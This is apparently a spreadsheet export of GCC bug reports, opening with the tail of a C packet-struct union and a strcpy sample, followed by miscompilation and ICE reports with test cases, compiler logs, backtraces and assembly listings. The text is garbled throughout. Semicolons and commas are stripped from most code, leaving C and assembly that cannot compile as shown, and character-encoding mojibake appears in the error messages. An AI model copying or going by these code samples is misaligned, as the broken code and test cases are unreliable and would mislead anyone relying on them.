    unsigned char  m_unk31[6]
  } Start
  struct { // size = 2
//    BYTE m_Cmd        // 0 = 0x33
    unsigned char m_Arg        // 1 = (1=pause0=restart)
  } Pause
  struct { // size = 5    // put client to war mode.
//            BYTE m_Cmd        // 0 = 0x72
    unsigned char m_warmode    // 1 = 0 or 1
    unsigned char m_unk2[3]    // 2 = 00 32 00
  } War
  struct { // size = 2
//            BYTE m_Cmd            // 0 = 0x4f
    unsigned char m_level        // 1=0-19 19=dark On t2a 30=dark
  } Light
  struct { // size = 4
//    m_Cmd            // 0 = 0x65
    unsigned char m_type        // 1 = type. 0=dry 1=rain 2=snow
    unsigned short m_ext        // 2 = other weather info (severity?)
  } Weather
  struct { // size = 19 // set client player view xyz.
//    unsigned char m_Cmd            // 0 = 0x20
    unsigned int m_UID        // 1-4 = my UID.
    unsigned short m_id            // 5-6
    unsigned char m_zero7        // 7 = 0
    unsigned short m_color        // 8-9
    unsigned char m_mode        // 10 = 0=normal 4=poison 0x40=attack 0x80=hidden
    unsigned short m_x            // 11-12
    unsigned short m_y            // 13-14
    unsigned short m_zero15        // 15-16 = noto ?
    unsigned char m_dir            // 17 = high bit set = run
    unsigned char m_z            // 18
  } View
  struct { // size = 23 or var len // draw char
//    unsigned m_Cmd        // 0 = 0x78
    unsigned short m_len    // 1-2 = 0x0017 or var len?
    unsigned int m_UID    // 3-6=
    unsigned short m_id    // 7-8
    unsigned short m_x    // 9-10
    unsigned short m_y    // 11-12
    unsigned char m_z        // 13
    unsigned char m_dir        // 14 = DIR_TYPE
    unsigned short m_color    // 15-16 = COLOR_TYPE
    unsigned char m_mode    // 17 = CHARMODE_WAR
    unsigned char m_noto    // 18 = NOTO_TYPE
    struct {  // This packet is extendable to show equip. size = 9
      unsigned int m_UID    // 0-3 = 0 = end of the list.
      unsigned short m_id        // 4-5 = | 0x8000 = include m_color.
      unsigned char m_layer    // LAYER_TYPE
      unsigned short m_color    // only if m_id | 0x8000
    } *equip
  } Chars
  struct {   // size = 4    // Set Game Time. not sure why the client cares about this.
//    unsigned char m_Cmd        // 0 =0x5b
    unsigned char m_hours
    unsigned char m_min
    unsigned char m_sec
  } Time
  struct { // size = 12
//    unsigned char m_Cmd        // 0 = 0x54
    unsigned char m_flags    // 1 = quiet infinite repeat or single shot (0/1)
    unsigned short m_id        // 2-3=sound id (SOUND_TYPE)
    unsigned short m_speed    // 4-5=0 = (speed/volume modifier?)
    unsigned short m_x        // 6-7
    unsigned short m_y        // 8-9
    unsigned short m_z        // 10-11
  } Sound
  struct {// size = 3    // response to pressing the chat button
//            BYTE m_Cmd        // 0 = 0xb9
    unsigned short m_enable
  } ChatEnable
  struct {// size = 14 + 30 + var
//            BYTE m_Cmd            // 0 = 0x1C
    unsigned short m_len        // 1-2 = var len size.
    unsigned int m_UID        // 3-6 = UID num of speaker. 01010101 = system
    unsigned short m_id            // 7-8 = CREID_TYPE of speaker.
    unsigned char m_mode        // 9 = TALKMODE_TYPE
    unsigned short m_color        // 10-11 = COLOR_TYPE.
    unsigned short m_font        // 12-13 = FONT_TYPE
    char m_name[MAX_NAME_SIZE]    // 14
    char m_text[1]        // var size.
  } Speak
  struct {// size = 10 + var    // Read scroll
//            BYTE m_Cmd            // 0=0xA6
    unsigned short m_len        // 1-2
    unsigned char  m_type        // 3 = form or gump = 0=tips1=notice or 2 (SCROLL_TYPE)
    unsigned int m_context    // 4-7 = context info passed from server
    unsigned short m_lentext    // 8
    char m_text[1]        // 10
  } Scroll
  struct {// size = 19    or var len // draw the item at a location
//    unsigned char m_Cmd        // 0 = 0x1a = XCMD_Put
    unsigned short m_len    // 1-2 = var len = 0x0013 or 0x000e or 0x000f
    unsigned int m_UID    // 3-6 = UID | UID_SPEC
    unsigned short m_id        // 7-8
    unsigned short m_amount    // 9-10 - only present if m_UID | UID_SPEC = pile (optional)
    unsigned short m_x        // 11-12 - | 0x8000 = m_dir arg.
    unsigned short m_y        // 13-14 = y | 0xC000 = m_color and m_flags fields.
    unsigned char m_dir        // (optional)
    unsigned char m_z        // 15 = signed char
    unsigned short m_color    // 16-17 = COLOR_TYPE (optional)
    unsigned char m_flags    // 18 = 0x20 = is it movable ? (direction?) (optional)
  } Put
  struct {// size = 17    // simple move of a char already on screen.
    //BYTE m_Cmd        // 0 = 0x77
    unsigned int m_UID    // 1-4
    unsigned short m_id        // 5-6 = id
    unsigned short m_x        // 7-8 = x
    unsigned short m_y        // 9-10
    unsigned char m_z        // 11
    unsigned char m_dir        // 12 = DIR_TYPE (| 0x80 = running ?)
    unsigned short m_color    // 13-14 = COLOR_TYPE
    unsigned char m_mode    // 15 = CHARMODE_WAR
    unsigned char m_noto    // 16 = NOTO_TYPE
  } CharMove
  struct {// sizeo = 5    // remove an object (item or char)
    //BYTE m_Cmd            // 0 = 0x1D
    unsigned int m_UID        // 1-4 = object UID.
  } Remove
  struct {// size = 14 // Combat type animation.
    //BYTE m_Cmd            // 0 = 0x6e
    unsigned int m_UID        // 1-4=uid
    unsigned short m_action        // 5-6 = ANIM_TYPE
    unsigned char m_zero7        // 7 = 0 or 5 ?
    unsigned char m_dir
    unsigned short m_repeat        // 9-10 = repeat count. 0=forever.
    unsigned char m_backward    // 11 = backwards (0/1)
    unsigned char m_repflag        // 12 = 0=dont repeat. 1=repeat
    unsigned char m_framedelay    // 13 = 0=fastest.
  } CharAction
  struct {// size = 20    // Add Single Item To Container.
    //BYTE m_Cmd        // 0 = 0x25
    unsigned int m_UID    // 1-4
    unsigned short m_id
    unsigned char m_zero7
    unsigned short m_amount
    unsigned short m_x
    unsigned short m_y
    unsigned int m_UIDCont    // the container.
    unsigned short m_color
  } ContAdd
  struct {// size = 26
    //BYTE m_Cmd        // 0=0x23
    unsigned short m_id
    unsigned short m_unk3    // 3-4 = 0
    unsigned short m_unk5    // 5-9 = ?
    unsigned char  m_unk7    // 7 = 0 72 99 c1 73
    unsigned int m_srcUID // NULL if from ground.
    unsigned short m_src_x
    unsigned short m_src_y
    unsigned char m_src_z
    unsigned int m_dstUID
    unsigned short m_dst_x
    unsigned short m_dst_y
    unsigned char m_dst_z
  } DragAnim
}
union serverMsgs mensagem
int main() {
    strcpy(mensagem.bufferabcdefghijklmnopqrstuvxyzw)
    return 0
}</t>
  </si>
  <si>
    <t>flus</t>
  </si>
  <si>
    <t>GCC-16195</t>
  </si>
  <si>
    <t>[3.4 only] Miscompilation of GCC 3.3.x by 3.4.x</t>
  </si>
  <si>
    <t>The following testcase distilled from ggc-common.c in GCC 3.3.4 is miscompiled
on ppc64.  It loads a floating point value (70.0) into the pic register and
dereferences it thus the testcase segfaults.
/* { dg-do run } */
/* { dg-options -O2 } */
/* { dg-options -mminimal-toc { target powerpc64-*-* } } */
extern void abort (void)
extern void exit (int)
double __attribute__((noinline))
foo (void)
{
  return 16441577472.0
}
double __attribute__((noinline))
bar (double x)
{
  return x
}
int __attribute__((noinline))
test (void)
{
  double x = foo ()
  x = bar (x)
  x /= 1024 * 1024 * 1024
  x *= 70
  x = x &lt; 70 ? x : 70
  x += 30
  return x
}
int main (void)
{
  if (test () != 100)
    abort ()
  exit (0)
}</t>
  </si>
  <si>
    <t>GCC-79545</t>
  </si>
  <si>
    <t>gcc[5/6]: RS6000 xvcvuxdsp and xvcvsxdsp RTL defines have wrong type</t>
  </si>
  <si>
    <t>The following issue was found in gcc 6.1.  It also exists in gcc5.4.
The source and return operand types for xvcvuxdsp and xvcvsxdsp instructions
do not match the instruction definitions from the Power ISA document.  The current code expects a V2DF source and returns V4SI.  The two instructions should take a V2DI source and return V4SF.
Additionally there is a typo in the instruction generation for the xvcvuxdsp
instruction generates instruction xvcvuxwdp instead of xvcvuxdsp.  The issues are in file gcc/config/rs6000/vsx.md for define_insn vsx_xvcvsxdsp and  define_insn vsx_xvcvuxdsp RTL statements.</t>
  </si>
  <si>
    <t>carll</t>
  </si>
  <si>
    <t>GCC-4109</t>
  </si>
  <si>
    <t>undefined symbol whith -O2 on solaris 2.7 with gcc 3.0</t>
  </si>
  <si>
    <t>I have encountered a bug on Solaris 2.7 with gcc 3.0.
The problem occurs at link time. If the -O2 flag is used
then there is an undefined global symbol in the object file
and this symbol is not resolved at link time.
I use a standard gcc 3.0 built on Solaris 2.7:
(tucana) luc% gcc -v
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/3.0/specs
Configured with: ../configure --prefix=/usr/local --enable-shared
--enable-threads --enable-languages=c++f77java --enable-libgcj
Thread model: posix
gcc version 3.0
Release:
gcc-3.0
Environment:
Solaris 2.7
How-To-Repeat:
compile the attached file with the -O2 flag :
   gcc -O2 -c x.c
look at the symbol table :
nm x.o | grep LL
I get this on my machine :
[5]        |         0|       0|NOTY |GLOB |0    |UNDEF  |.LL9</t>
  </si>
  <si>
    <t>luc.maisonobe</t>
  </si>
  <si>
    <t>GCC-20731</t>
  </si>
  <si>
    <t>[3.4 only] contrib/gcc_update hard code -r gcc-3_4-branch</t>
  </si>
  <si>
    <t>I think hard code -r gcc-3_4-branch is a bad idea. You have to
do it for each branch. Why not check CVS/Tag and get it from
there?</t>
  </si>
  <si>
    <t>GCC-18203</t>
  </si>
  <si>
    <t>GCC-51511</t>
  </si>
  <si>
    <t>[4.6/4.7 regression] gcc.dg/pr45819.c fails on arm-linux-gnueabi due to PR50078+PR51466 fix</t>
  </si>
  <si>
    <t>The PR50078+PR51466 fix r182157 on 4.6 branch caused a test suite regression on arm-linux-gnueabi:
+FAIL: gcc.dg/pr45819.c (test for excess errors)
because the compiler now emits the following warning:
pr45819.c: In function 'ehci_hub_control':
pr45819.c:16:10: warning: mis-aligned access used for structure member [-fstrict-volatile-bitfields]
pr45819.c:16:10: note: when a volatile object spans multiple type-sized locations the compiler must choose between using a single mis-aligned access to preserve the volatility or using multiple aligned accesses to avoid runtime faults this code may fail at runtime if the hardware does not allow this access
I believe the warning is correct so perhaps the warning should just be suppressed
in pr45819.c with -w.  gcc-4.7-20111210 has the same issue.</t>
  </si>
  <si>
    <t>GCC-45229</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/20000412-4.c ICEs with -fgraphite-identity</t>
  </si>
  <si>
    <t>Current gcc trunk with the proposed graphite merge (http://gcc.gnu.org/ml/gcc-patches/2010-08/msg00080.html) still ICEs the compiler when the gcc.c-torture/execute/20000412-4.c testcase is compiled with -fgraphite-identity. The error appears as...
gcc-4 20000412-4.c -w -O2 -fgraphite-identity -lm -o 20000412-4.x2
20000412-4.c: In function â€˜mainâ€™:
20000412-4.c:17:7: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
and backtraces as...
gdb /sw/lib/gcc4.6/libexec/gcc/x86_64-apple-darwin10.4.0/4.6.0/cc1
GNU gdb 6.3.50-20050815 (Apple version gdb-1469) (Wed May  5 04:36:56 UTC 2010)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x86_64-apple-darwin...Reading symbols for shared libraries ............. done
(gdb) r -quiet -v -D__DYNAMIC__ 20000412-4.c -fPIC -quiet -dumpbase 20000412-4.c -mmacosx-version-min=10.6.4 -mtune=generic -auxbase 20000412-4 -O2 -w -version -fgraphite-identity -o /var/folders/1C/1CdoNxmNFHyOIjNBLNuJh++++TM/-Tmp-//ccuOxnFJ.s
Starting program: /sw/lib/gcc4.6/libexec/gcc/x86_64-apple-darwin10.4.0/4.6.0/cc1 -quiet -v -D__DYNAMIC__ 20000412-4.c -fPIC -quiet -dumpbase 20000412-4.c -mmacosx-version-min=10.6.4 -mtune=generic -auxbase 20000412-4 -O2 -w -version -fgraphite-identity -o /var/folders/1C/1CdoNxmNFHyOIjNBLNuJh++++TM/-Tmp-//ccuOxnFJ.s
Reading symbols for shared libraries .++++++++++++..... done
GNU C (GCC) version 4.6.0 20100807 (experimental) (x86_64-apple-darwin10.4.0)
	compiled by GNU C version 4.6.0 20100807 (experimental) GMP version 4.3.2 MPFR version 2.4.2-p3 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /sw/lib/gcc4.6/lib/gcc/x86_64-apple-darwin10.4.0/4.6.0/../../../../x86_64-apple-darwin10.4.0/include
#include ... search starts here:
#include  search starts here:
 /sw/lib/gcc4.6/lib/gcc/x86_64-apple-darwin10.4.0/4.6.0/include
 /sw/lib/gcc4.6/include
 /sw/lib/gcc4.6/lib/gcc/x86_64-apple-darwin10.4.0/4.6.0/include-fixed
 /usr/include
 /System/Library/Frameworks
 /Library/Frameworks
End of search list.
GNU C (GCC) version 4.6.0 20100807 (experimental) (x86_64-apple-darwin10.4.0)
	compiled by GNU C version 4.6.0 20100807 (experimental) GMP version 4.3.2 MPFR version 2.4.2-p3 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 51323d20c79050973b53377b407f3f68
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x0000000000000000
is_gimple_reg (t=0x0) at ../../gcc-4.6-20100807/gcc/gimple.c:2861
2861	  if (TREE_CODE (t) == SSA_NAME)
(gdb) bt
#0  is_gimple_reg (t=0x0) at ../../gcc-4.6-20100807/gcc/gimple.c:2861
#1  0x00000001004bcde9 in rewrite_cross_bb_scalar_deps_out_of_ssa (scop=) at ../../gcc-4.6-20100807/gcc/graphite-sese-to-poly.c:2468
#2  0x0000000100495645 in graphite_transform_loops () at ../../gcc-4.6-20100807/gcc/graphite.c:291
#3  0x000000010074121a in graphite_transforms () at ../../gcc-4.6-20100807/gcc/tree-ssa-loop.c:296
#4  0x0000000100582786 in execute_one_pass (pass=0x100c74260) at ../../gcc-4.6-20100807/gcc/passes.c:1567
#5  0x0000000100582a5d in execute_pass_list (pass=0x100c74260) at ../../gcc-4.6-20100807/gcc/passes.c:1622
#6  0x0000000100582a6f in execute_pass_list (pass=0x100c742c0) at ../../gcc-4.6-20100807/gcc/passes.c:1623
#7  0x0000000100582a6f in execute_pass_list (pass=0x100c74560) at ../../gcc-4.6-20100807/gcc/passes.c:1623
#8  0x0000000100582a6f in execute_pass_list (pass=0x100c73700) at ../../gcc-4.6-20100807/gcc/passes.c:1623
#9  0x00000001006af1fc in tree_rest_of_compilation (fndecl=0x141e2b000) at ../../gcc-4.6-20100807/gcc/tree-optimize.c:452
#10 0x00000001008819fd in cgraph_expand_function (node=0x141e2a158) at ../../gcc-4.6-20100807/gcc/cgraphunit.c:1643
#11 0x0000000100884caa in cgraph_optimize () at ../../gcc-4.6-20100807/gcc/cgraphunit.c:1722
#12 0x000000010088533a in cgraph_finalize_compilation_unit () at ../../gcc-4.6-20100807/gcc/cgraphunit.c:1185
#13 0x000000010001cf05 in c_write_global_declarations () at ../../gcc-4.6-20100807/gcc/c-decl.c:9698
#14 0x000000010064145e in toplev_main (argc=19 argv=0x7fff5fbfef28) at ../../gcc-4.6-20100807/gcc/toplev.c:983
#15 0x0000000100001914 in start ()
(gdb)</t>
  </si>
  <si>
    <t>GCC-10078</t>
  </si>
  <si>
    <t>bad code generated with optimisation.</t>
  </si>
  <si>
    <t>When compiled with -O or -O2 this program return the last greatest value intead of the first...
Release:
gcc (GCC) 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
Environment:
Linux machine 2.4.18-14smp #1 SMP Wed Sep 4 11:55:37 EDT 2002 i686 athlon i386 GNU/Linux
How-To-Repeat:
When compiled with 'gcc -Wall bug-20030313.c' you get the correct result (return == 0) when compiled with 'gcc -Wall -O2 bug-20030313.c' you get the wrong result (return != 0).</t>
  </si>
  <si>
    <t>ac</t>
  </si>
  <si>
    <t>GCC-48656</t>
  </si>
  <si>
    <t>[4.6 regression] [C++0x] cannot call member function without object</t>
  </si>
  <si>
    <t>Very similar to bug 47174:
struct A {
 int f()
 int f(int)
}
template  struct B : A
{
}
template  struct C : B
{
 void g() {
   A::f()
 }
}
This still fails with GCC 4.6.0 and -std=c++0x:
a.ii: In member function â€˜void C::g()â€™:
a.ii:11:11: error: cannot call member function â€˜int A::f()â€™ without object</t>
  </si>
  <si>
    <t>GCC-40118</t>
  </si>
  <si>
    <t>cond-optab breaks powerpc bootstrap</t>
  </si>
  <si>
    <t>The powerpc bootstrap fails due to an inner block that has:
rtx op1 = XVECEXP (op1 0 0)
and this triggers the error:
error: â€˜op1â€™ may be used uninitialized in this function</t>
  </si>
  <si>
    <t>GCC-58570</t>
  </si>
  <si>
    <t>[4.9 Regression] wrong code for bitfields at -O2 and above</t>
  </si>
  <si>
    <t>The current gcc trunk mis-compiles the following code on x86_64-linux at -Os and above in both 32-bit and 64-bit modes.
This is a regression from 4.8.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --enable-languages=cc++objcobj-c++fortranlto --disable-werror --enable-checking=release --with-gmp=/usr/local/gcc-trunk --with-mpfr=/usr/local/gcc-trunk --with-mpc=/usr/local/gcc-trunk --with-cloog=/usr/local/gcc-trunk --prefix=/usr/local/gcc-trunk
Thread model: posix
gcc version 4.9.0 20130928 (experimental) [trunk revision 203003] (GCC) 
$ 
$ gcc-trunk -O1 small.c
$ a.out
1
$ gcc-4.8 -O3 small.c
$ a.out
1
$ gcc-trunk -O3 small.c
$ a.out
0
$ gcc-trunk -O2 small.c
$ a.out
0
$ gcc-trunk -Os small.c
$ a.out
0
$
------------------------------------
int printf (const char * ...)
#pragma pack(1)
struct S
{
  int f0:15
  int f1:29
}
int a b c e = 1 g
static struct S d[6]
long long f
static short
foo (int p)
{
  for (b = 0 b &lt; 1 b++)
    {
      g |= 1
      for ( a &lt; 1 a++)
	{
	  int i
	  if (p &lt; c - 1)
	    return 4
	  if (p)
	    for (i = 0 i &lt; 6 i++)
	      {
		struct S j = {1 1}
		d[i] = j
	      }
	  continue
	}
    }
  return 0
}
int
main ()
{
  if (e)
    foo (!f)
  printf (%d\n d[0].f1)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-49781</t>
  </si>
  <si>
    <t>[x32] Unnecessary lea in x32 mode</t>
  </si>
  <si>
    <t>[hjl@gnu-6 pr47383]$ cat x.i
static int heap[2*(256 +1+29)+1]
static int heap_len
static int heap_max
void 
__attribute__ ((noinline))
foo (int elems)
{
  int n m
  int max_code = -1
  int node = elems
  heap_len = 0 heap_max = (2*(256 +1+29)+1)
  for (n = 0 n &lt; elems n++)
    heap[++heap_len] = max_code = n
  do {
    n = heap[1]
    heap[1] = heap[heap_len--]
    m = heap[1]
    heap[--heap_max] = n
    heap[--heap_max] = m
  } while (heap_len &gt;= 2)
}
int
main ()
{
  foo (286)
  return 0
}
[hjl@gnu-6 pr47383]$ make x.s
/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/ -S -o x.s -mx32 -O2 -fPIC  x.i
[hjl@gnu-6 pr47383]$ cat x.s
	.file	x.i
	.text
	.p2align 415
	.globl	foo
	.type	foo @function
foo:
.LFB0:
	.cfi_startproc
	xorl	%eax %eax
	testl	%edi %edi
	pushq	%rbx
	.cfi_def_cfa_offset 16
	.cfi_offset 3 -16
	leal	4+heap(%rip) %ecx
	jle	.L10
	.p2align 410
	.p2align 3
.L7:
	leal	(%rcx%rax4) %edx
	movl	%eax (%rdx)
	addl	$1 %eax
	cmpl	%edi %eax
	jne	.L7
	leal	-1(%rdi) %ecx
.L3:
	leal	-1(%rdi) %eax
	movl	$573 %esi
	leal	2296+heap(%rip) %r11d
	leal	2292+heap(%rip) %r10d
	leal	heap(%rip) %ebx
	jmp	.L5
	.p2align 410
	.p2align 3
.L11:
	leal	(%rbx%rax4) %edx
	subl	$1 %eax
	movl	(%rdx) %ecx
.L5:
	movl	%eax %edx
	movl	4+heap(%rip) %r9d
	subl	$2 %esi
	subl	%edi %edx
	movl	%ecx 4+heap(%rip)
	sall	$3 %edx
	leal	(%r11%rdx) %r8d
	addl	%r10d %edx
	cmpl	$1 %eax
	movl	%r9d (%r8)
	movl	%ecx (%rdx)
	jg	.L11
	movl	%eax heap_len(%rip)
	movl	%esi heap_max(%rip)
	popq	%rbx
	.cfi_remember_state
	.cfi_def_cfa_offset 8
	ret
.L10:
	.cfi_restore_state
	movl	heap(%rip) %ecx
	xorl	%edi %edi
	jmp	.L3
	.cfi_endproc
.LFE0:
	.size	foo .-foo
	.section	.text.startupax@progbits
	.p2align 415
	.globl	main
	.type	main @function
main:
.LFB1:
	.cfi_startproc
	subq	$8 %rsp
	.cfi_def_cfa_offset 16
	movl	$286 %edi
	call	foo@PLT
	xorl	%eax %eax
	addq	$8 %rsp
	.cfi_def_cfa_offset 8
	ret
	.cfi_endproc
.LFE1:
	.size	main .-main
	.local	heap_len
	.comm	heap_len44
	.local	heap_max
	.comm	heap_max44
	.local	heap
	.comm	heap229232
	.ident	GCC: (GNU) 4.7.0 20110718 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-6 pr47383]$ 
Many lea insns can be combined with the load/store insn followed.</t>
  </si>
  <si>
    <t>GCC-7002</t>
  </si>
  <si>
    <t>gcc -fPIC incorrect optimization on i586</t>
  </si>
  <si>
    <t>The following piece of code (in a certain context) is compiled incorrectly
with -O2 -fPIC.  It compiles correctly without either of the two.
  vert = Matrix_Alloc(temp-&gt;NbRows-1 temp-&gt;NbColumns)
  for (i = 1 i NbRows i++)
    for (j = 0 j NbColumns  j++)
      ((vert-&gt;p[i-1][j]) = (temp-&gt;p[0][j])-(temp-&gt;p[i][j]))
(line 2257 of Lattice.i)
objdump:
      value_substract(vert-&gt;p[i-1][j]temp-&gt;p[0][j]temp-&gt;p[i][j])
 3e5:   8b 75 e4                mov    0xffffffe4(%ebp)%esi
 3e8:   8b bd 58 ff ff ff       mov    0xffffff58(%ebp)%edi
%edi contains temp-&gt;p[i]  
%ecx contains temp-&gt;p[0]
 3ee:   8b 04 f1                mov    (%ecx%esi8)%eax
 3f1:   8b 54 f1 04             mov    0x4(%ecx%esi8)%edx
 3f5:   2b 04 f7                sub    (%edi%esi8)%eax
 3f8:   1b 54 f7 04             sbb    0x4(%edi%esi8)%edx
subtraction is correctly performed
 3fc:   89 04 f7                mov    %eax(%edi%esi8)
but result is written back into temp-&gt;p[i][j] instead
of into vert-&gt;p[i-1][j]  
 3ff:   8b 85 50 ff ff ff       mov    0xffffff50(%ebp)%eax
 405:   89 54 f7 04             mov    %edx0x4(%edi%esi8) 
 409:   46                      inc    %esi
 40a:   89 75 e4                mov    %esi0xffffffe4(%ebp)
Release:
3.1
Environment:
System: Linux pool 2.4.12 #31 Sat Oct 13 23:07:11 CEST 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../../src/gcc/configure --enable-shared --prefix=/usr : (reconf
igured) ../../src/gcc/configure --enable-shared --prefix=/usr
GNU C Library stable release version 2.2.4 by Roland McGrath et al.
GNU ld version 2.12.90.0.9 20020526</t>
  </si>
  <si>
    <t>skimo</t>
  </si>
  <si>
    <t>GCC-55458</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE: in assign_by_spills at lra-assigns.c:1212 with -fPIC -m32 and simple asm volatile</t>
  </si>
  <si>
    <t>Created attachment 28767
reduced testcase
Compiler output:
$ gcc -v
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-193712-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-193712-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.8.0 20121121 (experimental) (GCC) 
$ gcc -fPIC -m32 testcase.c         
testcase.c: In function 'foo':
testcase.c:7:1: internal compiler error: in assign_by_spills at lra-assigns.c:1212
 }
 ^
0x8e29a1 assign_by_spills
        /mnt/svn/gcc-trunk/gcc/lra-assigns.c:1212
0x8e493b lra_assign()
        /mnt/svn/gcc-trunk/gcc/lra-assigns.c:1364
0x8e05dd lra(_IO_FILE*)
        /mnt/svn/gcc-trunk/gcc/lra.c:2298
0x896aa8 do_reload
        /mnt/svn/gcc-trunk/gcc/ira.c:4624
0x896aa8 rest_of_handle_reload
        /mnt/svn/gcc-trunk/gcc/ira.c:4737
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
I don't have a x86 compiler so I don't know if this ICEs the same way on an x86.</t>
  </si>
  <si>
    <t>GCC-56998</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in value_dependent_expression_p at cp/pt.c:19598</t>
  </si>
  <si>
    <t>Building the following program below crashes g++ 4.8.0 here.
--- ice.cc ---
class Secret
char IsNullLiteralHelper(Secret* p)
char (
struct C
{
    int val() { return 42 }
}
template 
unsigned f()
{
    return sizeof(IsNullLiteralHelper(C().val()))
}
--- ice.ii ---
# 1 ice.cc
# 1 
# 1 /usr/include/stdc-predef.h 1 3 4
# 1  2
# 1 ice.cc
class Secret
char IsNullLiteralHelper(Secret* p)
char (
struct C
{
    int val() { return 42 }
}
template 
unsigned f()
{
    return sizeof(IsNullLiteralHelper(C().val()))
}
--- Compiler output ---
Using built-in specs.
COLLECT_GCC=/usr/bin/g++
Target: x86_64-unknown-linux-gnu
Configured with: /build/src/gcc-4.8-20130411/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --enable-gnu-unique-object --enable-linker-build-id --enable-cloog-backend=isl --disable-cloog-version-check --enable-lto --enable-gold --enable-ld=default --enable-plugin --with-plugin-ld=ld.gold --with-linker-hash-style=gnu --disable-install-libiberty --disable-multilib --disable-libssp --disable-werror --enable-checking=release
Thread model: posix
gcc version 4.8.0 20130411 (prerelease) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-c' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/cc1plus -quiet -v -D_GNU_SOURCE ice.cc -quiet -dumpbase ice.cc -mtune=generic -march=x86-64 -auxbase ice -version -o /tmp/cchdGFwc.s
GNU C++ (GCC) version 4.8.0 20130411 (prerelease) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.8.0 20130411 (prerelease) GMP version 5.1.1 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/../../../../include/c++/4.8.0
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/../../../../include/c++/4.8.0/x86_64-unknown-linux-gnu
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/../../../../include/c++/4.8.0/backward
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/include
 /usr/local/include
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.8.0 20130411 (prerelease) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.8.0 20130411 (prerelease) GMP version 5.1.1 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 6f2c8a0d923b5a4be7dedefadd250ed4
ice.cc: In function â€˜unsigned int f()â€™:
ice.cc:13:48: internal compiler error: in value_dependent_expression_p at cp/pt.c:19598
     return sizeof(IsNullLiteralHelper(C().val()))
                                                ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>raphael.kubo.da.costa</t>
  </si>
  <si>
    <t>GCC-1707</t>
  </si>
  <si>
    <t>libstdc++ v3 gets confused by private assignment operators</t>
  </si>
  <si>
    <t>COMMAND LINE:
gcc -v -save-temps -W -Wall classA.cc
COMPILER OUTPUT:
Reading specs from /ncsu/meeberdt/local/gcc-curr/bin/../lib/gcc-lib/sparc-sun-so
laris2.6/2.97/specs
Configured with: /tmp/gcc-20010115/configure --prefix=/ncsu/meeberdt/local/gcc-0
115 --enable-shared --enable-languages=c++ --with-as=/ncsu/meeberdt/local/bin/as
 --with-ld=/ncsu/meeberdt/local/bin/ld
gcc version 2.97 20010115 (experimental)
 /ncsu/meeberdt/local/gcc-curr/bin/../lib/gcc-lib/sparc-sun-solaris2.6/2.97/cpp0
 -lang-c++ -D__GNUG__=2 -v -iprefix /ncsu/meeberdt/local/gcc-curr/bin/../lib/gcc
-lib/sparc-sun-solaris2.6/2.97/ -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHL
EVEL__=0 -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix
__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem=unix -Asystem=svr4 -D
__STDC_HOSTED__=1 -W -Wall -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc cla
